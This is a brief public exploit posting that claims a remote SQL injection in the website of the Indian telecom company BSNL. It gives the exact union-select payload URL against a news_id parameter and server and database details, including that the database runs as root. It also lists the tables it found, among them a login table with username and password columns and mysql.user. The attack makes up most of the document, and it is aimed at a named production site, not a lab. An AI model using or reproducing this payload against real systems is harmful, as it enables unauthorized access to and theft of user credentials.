-----------------------------------------------------------------------------------------------

[+] Indian Telcome Compny BSNL suffers from a remote SQL injection
vulnerability
[+] Author: Rohit Bansal

---------------------------------------------------------------------------------------
Host Information

    Server = Apache/2.0.46 (Red Hat)
    Version = 4.1.13-standard
    Powered by = PHP/4.3.2
    Current User = root@localhost
    Current Database = bsnl
    Supports Union = yes
    Union Columns = 17

Url| http://www.bsnl.co.in/newsdetailed.php?news_id=371

Vuln: http://www.bsnl.co.in/newsdetailed.php?news_id=371+and+1=0+ and 1=0
Union Select  1 , UNHEX(HEX([visible]))
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Comment: --

Visible Column: 2

Hexed: True

Cookie:

Keyword:

Param:

Database:

Tables:login
    login
    mysql.useR
    news
    user

Columns: Table login
    username
    password


---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec,Evilfinger
---------------------------------------------------------------------------------------